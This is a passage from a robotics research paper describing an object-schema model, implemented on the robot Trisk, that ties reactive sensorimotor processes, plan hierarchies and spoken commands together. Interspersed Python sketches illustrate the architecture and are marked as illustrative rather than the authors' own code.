drescher strived for a learning system that minimized “innate” structures, preferring a highly data-driven learning system that constructed primitive object schemas out of very low level sensorimotor primitives. in practice the implementations based on this approach failed to scale to environments beyond extremely simple grid-worlds. in contrast, our approach provides fairly rich built-in structures in the form of robotic controllers and perceptual processing routines with the goal of implementing more capable systems that demonstrate robust real world object-directed behaviour. drescher's work suggests future directions for introducing structure learning capabilities into our approach by “deconstructing” our innate schema structures and enabling the system to reconstruct schemas based on experience. under the schema view, objects are a useful abstraction that brings structure to otherwise incoherent and overwhelming sensorimotor experience. a system with no object representation would have to explicitly encode an enormous network of sensorimotor expectations just to gain basic abilities like object persistence, while a system with an object representation can expect that a green object will continue to appear green. object schemas thus enable the system to organize perceptions and actions in ways that matter to the system's programmed goals. our model provides a computational/mechanistic interpretation of the schema concept with sufficient detail to implement on a physical robot. reactive grounded language robots several mobile robot systems include the ability to take verbal commands [ , , , ]. some of these robots can also run collision-avoidance behaviours in competition with verbally-commanded behaviours, using a mechanism like those in a subsumption-based system. in essence, such systems use smpa-based language grounding grafted atop a behaviour-based reactive robot, granting the benefits of both a full representation and behaviour-based responsiveness. figure shows a depiction of this model. however, our object schema approach is specifically not adding smpa to a reactive robot. rather than temporally interspersing responsive behaviours with language use and planning, our approach constructs object representations for language use and planning using the responsive behaviours, so a sensorimotor event can rapidly alter linguistic and planning structures and processes. a collision with an object not only causes our robot to pull back to avoid damage, but the process handling the collision also provides updated knowledge of the object's expected location, altering the target location for subsequent verbally-commanded grasping actions. in contrast, the reactive smpa approach would use separate processes for collision- handling and for building a model from sensory input to locate objects for verbal command processing. our object schemas are thus more adept at leveraging information from the reactive level. a high-level overview of our approach is depicted in figure to contrast with the preceding smpa diagram. other grounded language systems numerous previous efforts have addressed language grounding either in physical or virtual worlds (see [ ] for a survey of models of word grounding, and a collection of recent papers on the topic introduced in [ ]). winograd's shrdlu [ ] carried out natural language commands in a symbolic “simulator” of a blocks-world manipulation robot. 
while winograd abstracted away many of the core issues we focus on here related to interacting with and representing real objects, shrdlu's linguistic performance remains impressive to this day. many other language-grounding systems such as [ , , ] connect aspects of language use or word meaning to perceptual features grounded in objects, but do not address the underlying problem of how a machine might conceive of objects in the first place. several other researchers pairing language and robotics [ , , ] focus on evolving novel languages between agents or robots trying to communicate. our focus is on representations specifically appropriate to pre-existing human languages that can be used in human-robot interaction tasks. in our previous work we developed a robot called ripley that is able to respond to spoken commands such as “hand me the blue one on your left” [ , ]. ripley was not, however, responsive to changes or corrections, and action failures had no impact on decision-making beyond a simple retry mechanism. in contrast, our new approach uses a planning mechanism to make decisions, respond to sudden changes, and replan dynamically. interaction processes and the object schema model as described in the “reactive grounded language robots” section above, an smpa model built on top of a reactive robot system could carry out verbal tasks, but its reactive processes would function independently of the verbal processing. in contrast, our object schema model coordinates language use, planning, and sensorimotor expectations by using object representations built out of the reactive processes. we call these processes interaction processes (in this context we sometimes just call them “processes” for brevity), and they form the basic building block of the model. the interaction processes are simultaneously organized into object schemas, which represent objects, and plan hierarchies, which coordinate action planning. for language purposes, the object schemas and plan hierarchies both serve as representations that language can be grounded to. for example, noun phrases can connect to the object schemas, and verb phrases in commands can connect to the plan hierarchies. in this section we describe the model in greater detail. interaction processes and histories the fundamental building block of the model is the interaction process. interaction processes perform tasks such as taking sensory input, producing motor output, and manipulating internal records. the interaction processes run concurrently and continuously, thus ensuring responsiveness. each interaction process provides information to other processes by writing data to shared memory. by building object schemas and plan hierarchies out of interaction processes, information in the shared memory is coordinated between the sensorimotor modalities, planning, and language use. interaction processes have a main loop that can be started and stopped, and some processes exit when their main loops complete their programmed tasks. these tasks could include finding interesting visual regions or reaching the robot arm towards an object. figure shows a visual notation for four interaction processes with various run states (represented by the left-side semicircle) and various finish states (represented by the right-side semicircle). interaction histories the data that each interaction process writes to shared memory is called its interaction history. the interaction histories allow processes to provide information to each other. 
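a schematic sketch of the interaction-process idea is given below: each process runs its own loop concurrently and writes attribute or completion data to a dedicated slot in shared memory. the class and field names are our own shorthand, not the authors' implementation.

```python
# Schematic sketch (names are shorthand, not the authors' code): an interaction
# process runs its own loop in a thread and writes attribute data to its
# dedicated interaction-history slot; when its task finishes it writes
# completion data instead.
import threading
import time

class InteractionProcess(threading.Thread):
    def __init__(self, name, shared_memory):
        super().__init__(daemon=True)
        self.name = name
        self.history = shared_memory.setdefault(name, [])  # dedicated slot
        self._stop_event = threading.Event()

    def step(self):
        """One pass of the main loop; return completion data to exit, else None."""
        raise NotImplementedError

    def run(self):
        while not self._stop_event.is_set():
            done = self.step()
            if done is not None:
                self.history.append({"completion": done, "t": time.time()})
                return
            time.sleep(0.05)

    def stop(self):
        self._stop_event.set()

class ColourTracker(InteractionProcess):
    """Toy sensory process: keeps writing a (fake) colour attribute forever."""
    def step(self):
        self.history.append({"attribute": {"colour": (0.1, 0.8, 0.2)}, "t": time.time()})
        return None

class GraspAction(InteractionProcess):
    """Toy action process: 'attempts' a grasp, then reports success."""
    def step(self):
        return {"success": True}

if __name__ == "__main__":
    shared = {}
    procs = [ColourTracker("vision.colour", shared), GraspAction("motor.grasp", shared)]
    for p in procs:
        p.start()
    time.sleep(0.2)
    for p in procs:
        p.stop()
        p.join(timeout=0.2)
    print({k: v[-1] for k, v in shared.items()})   # latest history entry per process
```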
this use of shared memory somewhat resembles a traditional blackboard model, except that each process can only write to its dedicated space. there are two primary types of history data: attribute data, which is returned while a process is running, and completion data, which is returned when a process' loop is completed (e.g., finishing an attempt to touch an object). attribute data contains information to be incorporated into knowledge of the attributes of an object (such as colour, shape, and location). the attributes of an object can be continuous (e.g., colour and weight as measured from sensory input) or discrete (e.g., a labelled category for colour or weight). completion data contains information about whether a process completed successfully or not, as well as timing information about the process' execution. completion data, as compiled over time, is incorporated into knowledge of the affordances of an object (such as liftability or graspability). figure shows the two types of history data deriving from interaction processes. process classes each interaction process in the system is an instance of a process class. each process class defines the execution loop that its instances run. the execution loops for some of these classes exit at a defined point (e.g., finishing a grasping action) and the process reports completion data to its history. other execution loops cycle forever, causing the process to write attribute data to its history until it is destroyed (e.g., its object schema is deleted). the following are the major types of process classes: sensory processes are interaction processes that monitor incoming sensory data and write relevant data to their interaction histories. subtypes in our implementation include collision detectors, visual trackers, and touch trackers. the visual trackers watch visual input and provide continuously updated visual information about an object. the touch trackers watch touch sensor input to determine if an object is being grasped. if the object is grasped, the touch trackers output the weight of the object and the location of the object based on the hand's location. each sensory process is intended to loop forever. action processes are interaction processes that, when activated by the planning system, send motor commands to the robot. examples include a process to move the robot arm away from a collision, or to grasp the fingers around an object. an action process reports successful or failed completion when its attempt to perform its programmed actions is done. plan fragment processes operate in the planning system to coordinate actions and preconditions. for instance, the plan fragment for grasping an object could require the precondition that the hand be open and positioned at the object's location. then, it would trigger the action for closing the fingers. plan fragment processes declare themselves complete when their attempt to perform their programmed sequence is done. these processes are often created in response to verbal commands. condition processes continuously assess whether a specified condition is true or not, and when not true they trigger the planning system to search for plan fragment and action processes that can render them true. condition processes loop endlessly until removed from their plan hierarchy, although for planning purposes they add a piece of completion data to their histories when their conditions are true. 
translation processes convert interaction history data from other processes to a new form, such as a transformation from visual -d data to -d coordinates for targeting the arm, or a categorization from continuous colour data to a discrete colour category. these processes loop forever, and the results of their translations are written to their own interaction histories. the discrete categories (such as colour or shape labels) are used for connecting noun phrases to object schemas. coordination processes maintain the integrity of object schemas by manipulating other interaction processes. each object schema has a coordination process which monitors interactions between processes within that object schema. for instance, if visual and touch tracking disagree about an object's location, the coordination process can detach one of the processes from the object schema to resolve the conflict. these processes also loop forever, until destroyed along with their object schemas. reference processes receive noun phrases from speech input and attempt to connect the noun phrases to object schemas with matching attributes. for instance, “the green block” leads to a reference process that reads interaction histories of each active object schema to find one that best fits “green” and “block.” these processes exit and report completion when a matching object schema is identified. object schemas and the belief context interaction processes can be incorporated into (bound to) structures called object schemas. each object schema represents one physical object in the system's environment, and consists of a container that holds interaction processes that are considered to be “about” the represented object. object schemas are stored in the belief context, which is a structure that stores object schemas along with accumulated affordance information. the belief context constitutes the set of beliefs that the system currently holds about its environment and its affordances. when an interaction process is bound to an object schema, history data for that process becomes associated with the object schema as well, and is treated as attribute or affordance information for the represented object. the object schemas act as discrete entities for planning and language use. figure depicts an object schema that consists of several interaction processes and, by association, their histories. not all interaction processes are bound to object schemas. processes that provide incoming sensory input (such as collision detection and visual segmentation) typically remain unbound. object expectations when an interaction process is part of an object schema, its interaction history can be used to generate expectations of future history data. expectation data is stored with the interaction process, alongside the history data that is being predicted. there are two types of expectation data: expected attributes, which predict attribute data, and expected affordances, which predict completion data. expectations are used by the planning system to select a course of action. these expectations of future interactions would not be as straightforward to compute without the use of an object-centred framework, as mentioned in “object representation,” above. the visual notation for expectations is given in figure . completion statistics in addition to object schemas, the belief context also stores statistics on completed action and plan fragment processes. 
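a standalone python sketch of these two containers may help; it is our own simplified illustration (the names ObjectSchema, BeliefContext, record_completion and expected_success are hypothetical), showing an object schema as a holder of bound processes and attribute data, and a belief context that stores schemas together with completion statistics and derives a rough success likelihood from them.

```python
from collections import defaultdict


class ObjectSchema:
    """container for the processes bound to one physical object and the
    attribute data accumulated about it."""

    def __init__(self, schema_id):
        self.schema_id = schema_id
        self.bound_processes = []   # interaction processes "about" this object
        self.attributes = {}        # e.g. {"colour": "red", "weight": "heavy"}

    def bind(self, process_name):
        self.bound_processes.append(process_name)


class BeliefContext:
    """holds the current object schemas plus completion statistics for
    finished action / plan-fragment processes, keyed by attribute label."""

    def __init__(self):
        self.schemas = {}
        # (attribute_label, action_name) -> [successes, attempts]
        self.completion_stats = defaultdict(lambda: [0, 0])

    def add_schema(self, schema):
        self.schemas[schema.schema_id] = schema

    def record_completion(self, schema, action_name, succeeded):
        for label in schema.attributes.values():
            stats = self.completion_stats[(label, action_name)]
            stats[1] += 1
            if succeeded:
                stats[0] += 1

    def expected_success(self, schema, action_name):
        """crude expected affordance: mean success rate over the object's labels."""
        rates = []
        for label in schema.attributes.values():
            successes, attempts = self.completion_stats[(label, action_name)]
            if attempts:
                rates.append(successes / attempts)
        return sum(rates) / len(rates) if rates else 0.5  # uninformative prior


if __name__ == "__main__":
    beliefs = BeliefContext()
    apple = ObjectSchema("obj-1")
    apple.attributes = {"colour": "red", "kind": "apple", "weight": "heavy"}
    beliefs.add_schema(apple)
    beliefs.record_completion(apple, "lift", succeeded=False)
    print(beliefs.expected_success(apple, "lift"))
```

in this sketch the statistics are keyed by attribute labels, which anticipates the indexing scheme described next.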
these statistics are indexed by the attribute data of the object schema that the processes were bound to. as an example, if a lift action towards a heavy red apple failed, then the belief context would note the failure of lifting with respect to the attributes for “heavy,” “red,” and “apple.” over time, trends emerge in these statistics; the “heavy” attribute might be a good predictor of difficulty lifting an object. these statistics are used to compute expected affordances, which in turn are used by the planning system to make decisions based on success likelihood. this learning of affordances for objects and attributes is the main type of learning present in our current system, although perceptual categories such as shapes and colours are also learned in a supervised manner in the current system. the association of success statistics with discrete object attributes such as “heavy” has an interesting ramification. at first glance, discrete attributes such as colour and weight labels (“red” or “heavy”) seem relevant to language use but have no efficacy in the robot's planning and actions. linking attributes to success statistics allows the attributes to predict affordances, thus linking the attributes to the physical capabilities of the robot. discrete object attributes then mean something in terms of the embodiment of the system, rather than only as a means of jointly referencing objects. this relates to the reason an embodied agent would represent discrete attributes in the first place -- awareness of discrete categories such as “heavy” helps to categorize objects based on their physical affordances. plan hierarchies and the planning system the planning system stores and manipulates plan hierarchies. like object schemas, plan hierarchies are structures composed of interaction processes. each hierarchy is a tree structure that organizes action, condition, and plan fragment processes into a coherent sequence to address a primary motivation at the root of the tree. the root of each plan hierarchy is a primary motivation, which represents a basic “need” that the system attempts to satisfy by attaching appropriate interaction processes to the hierarchy. the primary motivations have priority scores that vary over time, reflecting the changing priority for each basic need. the priority scores are passed along the hierarchy from parents to children. the non-root nodes are interaction processes that the planning system attempts to run to completion. for each node x, x's children are the interaction processes which must complete before x can. for instance, a node responsible for closing the hand around an object will have a child node that ensures that the robot's hand is at the object's position before attempting to perform the grasp. a part of such a hierarchy is shown in figure . plan hierarchies are built such that their leaf nodes form a sequence of action processes that will serve the primary motivation. across all the plan hierarchies, only the action process with the highest priority score is permitted to run at a given time. thus, the primary motivations compete according to their current priority score to build hierarchies and have the robot take actions in their service. the construction of a plan hierarchy proceeds as follows: . for the primary motivation with the highest priority score, the planning system examines a list of action and plan fragment processes that are known to satisfy the primary motivation. 
when multiple processes are available, the expectations computed in the belief context are consulted to determine which is most likely to succeed. the best action or plan fragment process is then attached as a child node, and the priority score is propagated to it. . when a plan fragment process is the highest priority leaf node, the first element in its sequence (either an action or a condition process) is created and attached as a child. the priority score is passed to the child, which eventually leads to the satisfaction of preconditions and the execution of actions. when a child completes, it is detached by the planning system and the next element in the plan fragment's sequence is created and processed. . when a condition process is the highest-priority leaf node, the planning system conducts a search and attaches a child in the same way as for a primary motivation. . action processes are always leaf nodes. action processes compete to execute based on the priority scores propagated from the primary motivations. when an executing action process is complete it is detached from its parent so the hierarchy's sequence can continue. by choosing appropriate plan fragments to coordinate actions and conditions, the planning system executes a coherent sequence of actions that satisfies the strongest current motivation of the system. the planning system interacts with the belief context by using object schemas as targets for action and also as sources of likelihood data to decide between possible actions. because each process in a plan hierarchy is also part of an object schema, changes recorded in interaction histories can rapidly affect likelihood data and cause revision of the plan hierarchy. language interaction incoming speech is provided to the model in the form of a parse tree. the tokens in the parse tree can then be connected to representations in the model. this primarily involves adding structures to the planning system in response to verb phrases, and connecting a noun phrase to an object schema that it refers to. when a verb phrase is received (in a command, for instance), it is assigned an appropriate structure in the planning system, such as a condition process that reports satisfaction when the command is executed. by attaching the structure to a primary motivation and setting the priority score, the planning system then takes responsibility for carrying out the relevant actions. object-directed interaction processes are typically part of the object schema of their targeted object. however, an object-directed process based on speech input has no initial target, because speech input can only provide a noun phrase that describes the target object; it cannot identify a specific object schema without further processing. because the object-directed processes cannot join an object schema until the system identifies the appropriate object schema, they are connected to a reference process until the correct object schema is found. reference processes are the interaction processes responsible for connecting object schemas to noun phrases. they search the object schemas in the current belief context for one with discrete attributes (which are automatically produced by translation processes) that correspond to the tokens in the noun phrase. for each noun phrase, a reference process is created and provided with the tokens from the phrase. the process then searches the current object schemas for one with the appropriate discrete attributes. 
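a minimal sketch of this attribute-matching search, under the assumption that discrete attributes are available as simple string labels; the function and variable names are ours, not the implementation's.

```python
def resolve_reference(tokens, schemas):
    """return the id of the schema whose discrete attributes cover the tokens.

    `schemas` maps schema ids to dicts of discrete attribute labels, e.g.
    {"obj-3": {"colour": "green", "shape": "block"}}.
    """
    best_id, best_score = None, 0
    for schema_id, attributes in schemas.items():
        labels = set(attributes.values())
        score = sum(1 for token in tokens if token in labels)
        if score > best_score:
            best_id, best_score = schema_id, score
    # require every content token to be accounted for before accepting a match
    return best_id if best_score == len(tokens) else None


if __name__ == "__main__":
    schemas = {
        "obj-1": {"colour": "red", "shape": "apple"},
        "obj-3": {"colour": "green", "shape": "block"},
    }
    print(resolve_reference(["green", "block"], schemas))  # -> obj-3
    print(resolve_reference(["blue", "cup"], schemas))     # -> None (no match yet)
```

a real reference process would additionally respect definiteness and cardinality, and would keep searching newly created schemas until a match appears.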
when a match is found, all object-directed interaction processes that are connected to the reference process are added to the matching object schema. speech-driven action and plan fragment processes in plan hierarchies cannot be activated until their reference processes are resolved and they have been added to object schemas. summary in the model, interaction processes handle sensory input, motor output, and internal recordkeeping. these interaction processes are organized into object schemas, each representing one physical object, and plan hierarchies, each representing one coherent sequence of actions. language is processed by connecting noun phrases to object schemas and verb phrases to structures in the plan hierarchies. this approach presents several benefits relative to the other approaches mentioned in the background section. our model extends behaviour-based systems by explicitly representing objects, and it extends language-grounding systems by maintaining responsiveness to the environment. furthermore, by building object schemas from reactive processes, our model gains several features over an smpa language system added to a reactive robot: computational scalability instead of performing a full round of processing on current sensory inputs, our object schema model permits each bit of sensory input to affect only specific aspects of planning and language use. for example, a collision with an object can trigger a cascade of processing that directly changes the target position for subsequent grasping actions, while an smpa approach would wait for the next modelling cycle to process all sensory input. by decoupling the processing of sensory inputs from each other, our approach decreases the latency time from sensory input to motor action, and renders our approach more amenable to parallelization across multiple processors or computers. decisions can be made and altered in our model based on the interaction of a small subset of processes, rather than waiting for a complete model to be generated from new sensory input. as grounded language systems increase in complexity from the current set of relatively limited domains, our approach offers a path for scalability. common currency our model, by collecting all processes directed towards an object into the object schema, provides a convenient means of interaction between language, planning, and sensory processes. for example, hearing “the apple is heavy” enables our system to alter its plans based on this information. the system would also have arrived at the same decision if it had prior physical experience with the apple, or with objects with visual similarity to the apple. likewise, if it has to lift the apple anyway, it can decide for itself how heavy the apple is, regardless of what it had been told. this convergence of multiple modalities, including language, would be more complicated to implement in an smpa model. multimodal affordances finally, our object schemas provide a convenient way to represent affordances, such as liftability and graspability, for grounding affordance-related words. this coordination of information from multiple sources in an object-centric fashion would also be difficult in a model where planning and action are represented separately from the objects themselves. implementation walkthrough the model has been implemented on a robot platform, named trisk. 
in this section we describe the physical and sensorimotor systems of the robot, and then we discuss key aspects of the implemented model as it produces a sequence of behaviours. the robot and the sensorimotor systems our robot platform, named trisk (figure shows the robot in action), is a six degree of freedom (dof) robotic arm with a four-dof barrett hand as its end effector, situated in front of a table on which manipulable objects are placed. six-axis force-torque sensors on each of the three fingers of the hand enable sensing of forces and collisions, including awareness of successful grasps. the downwards force of an object on the finger sensors provide the weight of the object. two cameras (only one is currently active for simplicity) sit in a head mounted on a four-dof neck, which allows the system to adjust its view of the environment and look up at the human for interactivity purposes. visual input from the active camera is sent through a colour-based segmentation algorithm (based on cmvision [ ]) that groups contiguous regions by colour. the current set of objects used for robot interactions consists of simple objects of uniform colour, so colour segmentation suffices for our purposes. visual input is also processed on demand by a mean-shift tracker [ ] based on edge and colour profile, and a -d shape recognition algorithm based on shape contexts [ ] when requested by vision-related interaction processes. visual information thus derived includes the size, shape, colour, and location of each object, and is discretized by translation processes for matching with incoming description words (such as “red” and “ball”). visual locations are transformed into arm-space coordinates for grasping by assuming that objects are on the plane of the table and performing the appropriate vector math. the motor control modules for the robot's arm and hand compute forward and inverse kinematics, so the hand can be brought via a smooth trajectory towards reachable -d coordinates. the fingers can be spread to enable grasping, or moved together to tap an object. touch input from the fingers is used along with arm kinematic information to provide the location, direction, and magnitude of contact forces between the fingers and physical objects. collisions are detected by monitoring forces on the fingertip sensors, torques on the arm motors, and computing positions relative to hard-coded nearby surfaces. it should be noted that the robot's hand and arm significantly occludes the camera view of the workspace. the kinematics of the arm and hand are used to create what we call an “occlusion zone” in the visual input. in this area of visual input, apparent visual objects are considered untrustworthy and thus not instantiated by the model. speech input is collected by a microphone headset worn by the human, and passed through the sphinx free speech recognizer and a probabilistic earley parser (from [ ]). the resulting parse trees provide structured tokens to be connected to object schemas and plan hierarchies. an example behaviour sequence in this section we narrate a sequence of behaviours (most of which is pictured in figure ) and discuss how the implementation produces this sequence. the sequence consists of the following behaviours: . the robot is looking at a table with a blue cup and a yellow ball on it. a green block and a red apple are then placed on the table. the system tracks the objects visually, maintaining the object representations throughout new visual frames. . 
the human says “group the green block and the red apple.” the robot reaches towards the red apple in order to move it towards the green block. . the human interrupts the robot's action, saying “the red apple is heavy.” the robot reaches for the green block instead. . the robot misses the green block, and its wrist collides with the block. the robot immediately pulls away from the block, avoiding damage. assuming it collided with the block, the system revises its location estimate for the block. . the robot adjusts its targeting, lifts the block, and moves it next to the red apple. behaviour  the scenario begins with the robot's head facing the table with the blue cup and yellow ball. at this point, two object schemas already exist within the system, one representing the cup and the other representing the ball. both of these object schemas have been created in response to the visual input. visual tracking the green block is then placed on the table. figure depicts the processing of the subsequent frame of visual input. this processing requires extracting information about both previously- known objects, as well as starting to represent and track the green block. the three visual regions are detected by the unbound sensory process that handles visual segmentation, and written to its interaction history. each of the pre-existing object schemas includes a visual tracking process for identifying regions in new visual frames that correspond to their objects. past history data for each object schema leads to visual expectations for the object's current appearance. these expectations are compared to the regions in the new frame. the closest match for each object schema is found according to a distance metric and then “claimed” by the schema's visual tracker. new schema creation the third region written by the segmenter process goes unclaimed. as depicted in figure , the unclaimed region triggers the creation of a new object schema. new object schemas start out with a coordination process, which is responsible for subsequently creating the other processes that will maintain the object schema's data and expectations. at the outset, a typical object schema consists of: • the coordination process that bootstraps the other necessary processes and removes processes when inconsistent data is detected. • visual and touch tracking processes to assimilate incoming sensory data. • translation processes to convert continuous sensory data (such as weight and colour) into discrete attribute categories (corresponding to word labels), and to convert between visual and touch coordinate systems. the visual tracker for each object provides information derived directly from the visual input frame, such as average colour, centroid location, and occupied pixel list. the translation processes then convert these into other attributes, such as colour category, shape, and location in physical space. the expected location in physical space is used for subsequent reaching and grasping actions. action, condition, and plan fragment processes are later added to some object schemas due to planning and language activity. an action process will be bound to an object schema if the action is targeted towards the corresponding object (such as moving towards or lifting the object). a condition process will be bound to an object schema if the condition being tested involves an attribute of the object schema (such as the object being at a specific location). 
likewise, a plan fragment process is bound to an object schema if actions and conditions within the plan fragment are targeted towards the object. in subsequent frames, the green block is tracked by its new object schema. the red apple is then handled similarly. behaviour  the human says “group the green block and the red apple.” speech recognition and the language parser convert this verbal input into a parse tree. the parse tree triggers the creation of a plan hierarchy to coordinate the requested actions. the noun phrases in the parse tree must be connected to object schemas. in order to narrate these mechanisms, we frame the discussion by first describing the full range of verbal inputs and motivations of our implementation. types of speech input we divide our speech inputs into four types: queries requests for information that require a verbal response, such as “is the green block near the red apple?” and “describe the block.” directives requests for the robot to perform motor action, such as “touch the red apple” and “move the block to the right.” assertives statements about the state of an object, such as “the red apple is heavy.” correctives partial directives which cause replacement in the immediately preceding full directive, such as “pick up the red ball... no, the green ball.” correctives are handled in a preprocessing step, by making the substitution into the preceding directive. in this example, the speech input is a directive, and leads to a plan hierarchy that attempts to execute a sequence of actions. primary motivations the implementation makes use of three primary motivations: safety the system makes plans to avoid taking damage. in the current implementation this entails avoiding and moving away from physical collisions. social the system attempts to interact with the human partner by answering queries and carrying out requested actions. curiosity the system explores objects by attempting to grasp and lift them. in doing so, the system learns about object affordances by automatically compiling statistics about completed action processes. speech inputs that request action are processed by attaching a plan fragment process to the social motivation. for a directive, the verb is used to determine the sequence of actions that constitutes the plan fragment. the social motivation is then given a sufficient priority score to cause the planning system to carry out the given task. reference processes once the plan fragment process inherits the priority score, the planning system will attempt to expand its plan hierarchy. however, processes in a plan hierarchy cannot be handled by the planning system until it is clear which object schemas they are directed towards. the parse tree for the directive contains two noun phrases, “the green block” and “the red apple.” a reference process is generated for each noun phrase and assigned to an expression based on the parse tree. as an example, the reference process for “the red apple” is assigned the following expression: (refexpr (= function (lambda (x) (p_and (red x) (apple x)))) (= definite "definite") (= cardinality " ")))) the reference process runs a search function that matches object schemas based on category attributes provided by translation processes that were trained in a supervised fashion. when an object schema with matching attributes is identified, the processes connected to the reference process (in this case, the plan fragment process for “group”) are then bound to the object schema so planning can continue. 
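as described under "primary motivations" above, a directive's plan fragment is attached to the social motivation and inherits its priority score; the wiring can be sketched as follows. this is our own illustrative python, with hypothetical names and made-up priority values, not the system's actual data structures.

```python
class PrimaryMotivation:
    """root node whose time-varying priority score is inherited by children."""

    def __init__(self, name, priority=0.0):
        self.name = name
        self.priority = priority
        self.children = []   # plan fragment, condition, or action processes

    def attach(self, node):
        node.priority = self.priority   # priority is passed from parent to child
        self.children.append(node)


class PlanFragment:
    """stand-in for a plan fragment process created from a verb phrase."""

    def __init__(self, verb, target_schema_ids):
        self.verb = verb
        self.targets = target_schema_ids
        self.priority = 0.0


# hypothetical wiring for the directive "group the green block and the red apple"
safety = PrimaryMotivation("safety", priority=0.0)      # spikes only on collisions
social = PrimaryMotivation("social", priority=0.6)      # raised to serve the human
curiosity = PrimaryMotivation("curiosity", priority=0.2)

group = PlanFragment("group", ["obj-3", "obj-1"])  # ids resolved by reference processes
social.attach(group)

print(group.priority)                    # inherits the social score: 0.6
print(safety.priority, curiosity.priority)
```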
plan hierarchy construction once an object schema is found for each of the two noun phrases, the planning system can continue by expanding the first sequence element of the “group” plan fragment. the sequence consists of a single condition, which tests whether the locations associated with the two schemas are near each other. this “grouped” condition process is created and attached as the child of the plan fragment. it then inherits the priority, and the planning system attempts to satisfy this condition. the expected results of each plan fragment is programmed with the plan fragment, so the planning system can search the list of expected results to find suitable plan fragments. the planning system can select one of two “move object” plan fragments, one that moves one object and one that moves the other. expected affordances in order to select between two possible plan fragment processes, the planning system creates both within their respective object schemas. once this is done, the belief context automatically assesses the expected affordances. this involves examining the history data of the object (i.e., how many times the object itself has been successfully moved) and the attribute-linked completion statistics (i.e., for the red apple, how often red objects are moved successfully, and how often apples are moved successfully). based on these statistics, a success likelihood is generated for each of the prospective plan fragment processes. the planning system will read these likelihoods and then select the plan fragment with the best chance of success. figure depicts the plan hierarchy as it considers the choice. figure shows the structure of this hypothetical hierarchy after it has been fully built and executed. behaviour  the robot has moved its open hand towards the apple in order to move it. at this point, the human says “the red apple is heavy.” the robot changes its mind and reaches for the green block instead. this behaviour is accomplished by processing the assertive input, updating expected affordances, and revising the plan. assertive input and expected attributes “the red apple is heavy” is a speech input that asserts a belief about an object. first, a reference process identifies the red apple's object schema. then, the label “heavy” is written as an expected attribute for the history data of the weight-categorizing translation process. affordance monitoring and plan revisions as soon as the expectation of “heavy” is added to the apple's object schema, the belief context re-evaluates the expected affordance of whether the apple can be moved by the robot. objects with the “heavy” attribute often cause lifting and moving processes to fail, and so the belief context records that any plan fragment processes attempting to lift and move the apple are likely to fail. this in turn causes the active “move object” plan fragment to expect failure, leading to a revision of the plan hierarchy. the system opts to move the block instead, and the robot proceeds to do so. behaviour  as the robot hand approaches the block, its wrist collides with the block rather than encircling the block with the fingers. it immediately pulls away from the block collision handling and claiming unbound data upon detecting the collision, the collision detection process writes information about the collision to its history. this is noticed by the primary motivation for safety, which immediately increases its priority score to the maximum possible. 
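the preemption just described rests on priority arbitration across all plan hierarchies; a minimal sketch (our own illustration, with made-up priority values) of how the single highest-priority action could be selected:

```python
def select_action(candidates):
    """candidates: list of (action_name, priority_score); highest score wins."""
    return max(candidates, key=lambda c: c[1])[0] if candidates else None


candidates = [
    ("move-hand-to-green-block", 0.6),    # serving the social motivation
    ("explore-yellow-ball", 0.2),         # serving the curiosity motivation
]
print(select_action(candidates))          # -> move-hand-to-green-block

# a detected collision spikes the safety motivation to the maximum score, so
# its retract action preempts everything else at the next selection
candidates.append(("retract-arm-from-collision", 1.0))
print(select_action(candidates))          # -> retract-arm-from-collision
```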
the action process for moving away from a collision runs immediately, and pulls the arm away. the safety motivation's priority score then drops back to zero. the collision location provided by the collision detection process is also monitored by the touch trackers of all object schemas. based on distance from an object's location estimate, each touch tracker can claim the new collision location as information about its object, writing the collision location to its interaction history. this is analogous to the claiming and writing of visual segment data by the visual trackers. in this example, the collision location is close to the block's expected location, and so the block's touch tracker revises its location estimate in physical space based on the collision. behaviour  after the interruption by the safety motivation, the social motivation resumes control. the “move hand” action process was deactivated before it completed, and so the plan hierarchy restarts the action process, which makes use of the new location estimate provided by the green block's touch tracker. the hand arrives at the green block, closes around it, moves it next to the apple, and releases it. multimodal tracking as the hand closes around the green block and begins to lift it, the touch tracker for the green block begins writing weight and location information to its interaction history. the touch tracker's location estimate is based on the location from the forward-kinematics for the hand. however, the visual tracker is continuing to provide visual locations based on the visual region associated with the block. supposing that the visual tracker and touch tracker were to provide location estimates with substantial discrepancy, the coordination process for the object schema then has to step in and reconcile the information. it does this by removing the touch tracker from the object schema. the newly- unbound touch tracker will be used as the basis for a new object schema, just as unclaimed visual regions lead to new object schemas. by concurrently tracking objects in multiple modalities, the model potentially provides a foundation for coordinating expectations between modalities in greater detail. for example, physically rotating an object may alter its perceived visual shape. this is left for future work. the model could also benefit from the ability to merge and split object schemas, to handle cases where multimodal tracking discovers an error such as one perceived object turning out to be two, or vice-versa. discussion the value of our model lies in its ability to retain a responsive coupling between its language use, planning, and sensorimotor modalities. here, we review some of the behaviours that underlie this ability: . if the robot is reaching for an object and it misses slightly, colliding its wrist with the object, it will respond to the collision by moving away from the point of contact. the point of contact will immediately be claimed by the object schema of the targeted object, which revises its expected physical location, which causes the robot to adjust its grasping target accordingly. . if the robot is reaching to move a red ball, and it accidentally lifts a nearby green block instead, the visual trackers will observe that the red ball is not moving, and will put down the green block and retry the grasp. this is the result of a discrepancy at the object schema level between the grasp trackers and the visual trackers, which is resolved by the coordination process. . 
when the human says “group the red apple and the green block... the red apple is heavy,” the new verbal information about the apple's weight is represented as an expectation in the same way as the equivalent physical interaction. this leads to a change in the expected affordances in the object schema, which leads to a re-evaluation of the planning system's hierarchy. the robot will reach for the green block instead. . suppose the human says “group the red apple and the green block,” without specifying any additional object information. if the robot then attempts to lift the red apple and repeatedly fails, this affects the expected affordances in the object schema in the same way, leading to the same re-evaluation. the data-sharing in our model that enables these sorts of responsive behaviours is made possible by the presence of interaction processes in both the object representations and the plan representations. in example , the touch tracker notices the touch contact near the expected location of its object schema, and claims the point of contact as another piece of expectation information. in example , the two trackers and the coordination process form a short information path between the touch and vision modalities, enabling a local correction. in example , new verbal information adjusts an expected affordance, so the belief context alters the success likelihood for the “move object” plan fragment. this plan fragment process is also present in the plan hierarchy, enabling immediate re-evaluation by the planning system. example shows the same mechanism with direct physical interaction. conclusion we have developed and implemented a model of object schemas that brings together responsive interactive robotics with natural language understanding. by building object schemas and plan hierarchies from the processes that govern responsive interaction, planning and language use are capable of leveraging information from the reactive processes directly and immediately. this stands in contrast to previous hybrid approaches that graft behaviour-based reactive control layers to smpa-based architectures. although there are many limitations to the model, the most critical one in our view is that currently all schema structures are manually constructed by human designers. as a result, we have had to take great care in creating physical environments that are consistent with the hand-coded structures of our robot. in the future we plan to turn this situation around by enabling robots to construct object schemas -- and higher order relational schemas as 